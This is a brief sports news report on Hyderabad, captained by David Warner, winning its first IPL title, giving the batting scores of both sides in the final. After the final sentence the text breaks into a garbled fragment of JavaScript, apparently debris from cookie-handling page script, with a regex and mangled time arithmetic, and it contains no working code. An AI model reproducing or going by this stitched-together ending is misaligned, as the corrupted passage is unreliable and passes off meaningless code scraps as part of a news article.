Aussie opener and Hyderabad captain David Warner has guided his side to their maiden IPL title overnight.

Warner blasted 69 runs from 38 balls at the top of the order to help his side to 7-208 off 20 overs.

Fellow Australian Ben Cutting and Yuvraj Singh chimed in with 39 and 38 respectively.

In reply, Royal Challenges Bangalore reached 7-200 off their 20 overs, falling nine runs short of victory.

Controversial West Indian batsman Chris Gayle top scored with 76 from just 38 deliveries, while Virat Kohli scored 54 from 35.

But it wasn't enough, as the pair's team crumbled underneath them. "(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));(U[1]):"",();||void 0===time){/1e3+86400),.('')}
